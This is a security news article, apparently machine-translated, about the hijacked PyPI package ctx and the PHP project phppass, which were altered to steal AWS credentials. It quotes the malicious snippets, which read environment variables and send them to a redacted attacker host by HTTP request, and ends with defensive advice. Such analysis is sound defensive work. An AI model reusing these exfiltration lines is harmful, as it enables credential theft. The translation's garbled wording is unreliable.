A sharp-sighted researcher at SANS recently wrote about a new and rather specific type Supply chain attack Against open source software modules in Python and PHP.
After an online discussion about a dubious public Python module, Ye Ching Tok mentioned that a package ctx
The popular PyPi repository suddenly received an “update”, although it was not touched otherwise in late 2014.
Theoretically, of course, there is nothing wrong with old packages coming back to life suddenly.
Sometimes, developers return to older projects when their regular schedule (or a guilt-ridden email from a chronic user) finally motivates them to apply some long-lasting bug fixes.
In other cases, new maintainers proceeded in good faith to revive “adware” projects.
However, packages can be the victim of confidential takeovers, where relevant account passwords are hacked, stolen, reset or otherwise compromised, making the package a beechhead for a new wave of supply chain attacks.
Simply put, some “revival” packages are run entirely in bad faith, giving cybercriminals a vehicle to extract malware under the guise of “security updates” or “feature improvements.”
Attackers don’t necessarily target any specific user of the package they compromise – often, they just watch and wait to see if someone reads their package for the top-end-switch …
… At which point they have a way of targeting users or companies that do.
New code, old version number
In this attack, Ye Ching Tok noticed that although the package was abruptly updated, its version number did not change, perhaps in the hope that some people might [a] Take the new version anyway, maybe even automatically, but [b] Don’t bother to look for differences in the code.
But a diff
(Too small The differenceWhere only new, modified or deleted lines in the code are examined) The lines added to the Python code are shown as follows:
if environ.get('AWS_ACCESS_KEY_ID') is not None: self.secret = environ.get('AWS_ACCESS_KEY_ID')
You may remember, from the infamous Log4Shell bug, which is the so-called Environmental variablesAccessible through os.environ
In Python, memory only key=value
Settings related to a specific running program.
The data presented in a program does not need to be written to a disk through a memory block, so it is an easy way to bypass confidential data like encryption keys when it prevents data from being mistakenly stored.
However, if you can poison a running program that already has access only to the memory-processing environment, you can read and steal the privacy for yourself, for example, by sending it into the clutter of regular-looking network traffic.
If you leave most of the source code that you are poisoning untouched, its normal functions will still work as before, and so harmful changes to the package may go unnoticed.
Why now?
Apparently, the reason for the recent attack on this package is that the server name used for email by the original maintainer has just expired.
The attackers were therefore able to purchase the now unused domain name, set up an email server of their own, and reset the password to the account.
The funny thing is, the poison has been mixed ctx
The package was soon updated twice, adding more “secret sauce” to the infected code, this time with more aggressive data-stealing code.
The requests.get()
The following line connects to an external server controlled by crooks, although we have modified the domain name here:
def sendRequest(self): str = "" for _, v in environ.items(): str += v + " " ### --encode string into base64 resp = requests.get("https://[REDACTED]/hacked/" + str)
Redacted Exfoliation Server Encoded Encoded Encoded Environment Variables (including any stolen data such as access keys) will receive random-looking data at the end of the URL as an innocent-looking string.
The response that comes back is not really important, as it is complete with outgoing requests, added secret information, which the attackers follow.
If you want to try it for yourself, you can create a unique Python program based on the above pseudocode, such as:
Then start a listening HTTP pseudoserver in a separate window (we used excellent ncat
Utility from Nmap Toolkit, as shown below), and run Python code.
Here, we’re in the bash shell, and we’re used env -i
Exclude environment variables to save space, and we’re running a Python exfoliation script with a duplicate AWS environment variable set (the access key we chose is one of Amazon’s own intentionally invalid examples used for documentation):
The listening server (you need to start it first to have something to connect to the Python code) will respond to the request and dump the sent data:
The GET /...
The line above captures the encoded data that was executed in the URL.
We can now decode base64
Reveals data from GET requests and fake AWS keys that we have added to the process environment in another window:
Related crimes
Out of curiosity, Ye Ching Tok went elsewhere to find the exfiltration servername that we modified above.
Shine!
The same server has recently become the code uploaded to a PHP project on GitHub, probably because it was compromised by the same attackers at the same time.
That project is called what used to be a valid PHP hashing toolkit phppass
But it now contains these three lines of unwanted and dangerous code:
$access = getenv('AWS_ACCESS_KEY_ID'); $secret = getenv('AWS_SECRET_ACCESS_KEY'); $xml = file_get_contents("http://[REDACTED]hacked/$access/$secret");
Here, the access secret of any Amazon web service, which is a pseudorandom character string, is extracted from the environment memory (getenv()
Equivalent to PHP above os.environ.get()
Rogue Python code you’ve seen before) and converted to a URL.
This time too the miscreants have used it http
Instead https
This way not only steals your confidential data for themselves, but also creates connections without encryption, thus disclosing your AWS privacy to anyone who crosses the Internet while logging your traffic.
What do you do?
- Do not blindly accept open-source package updates when they appear. Go through the code differences yourself before you decide which update is in your best interest. Yes, designated criminals will usually hide their invalid code changes more subtly than the hacks you see above, so it may not be so easy to detect. But if you don’t look at it, the bad guys can run away with whatever they want.
- Check suspicious changes before trusting a maintainer’s account See the documentation of the previous version of the code (probably, you already have the code) for details of previous maintenance contacts and see what has changed in the account since the last update. In particular, if you see domain names that have expired and have only recently been re-registered, or email changes that introduce new maintainers that have no obvious prior interest in the project, be suspicious.
- Do not rely solely on module tests that verify proper behavior. Look for generic tests that also detect unwanted, unusual, and unexpected behaviors, especially if those behaviors have no obvious connection to your modified package. For example, you shouldn’t connect to a utility network to calculate the password hash, so if you try to do this (of course using test data instead of live data!) Then you should suspect a foul play.
Such as threat detection tools Sophos XDR (XDR characters are industry terms Enhanced detection and response) Can help here by allowing you to keep an eye on the programs you are testing and then review their activity records for behaviors that shouldn’t be there.
After all, if you know what your software is supposed to do, you should know what it is No. I was going to!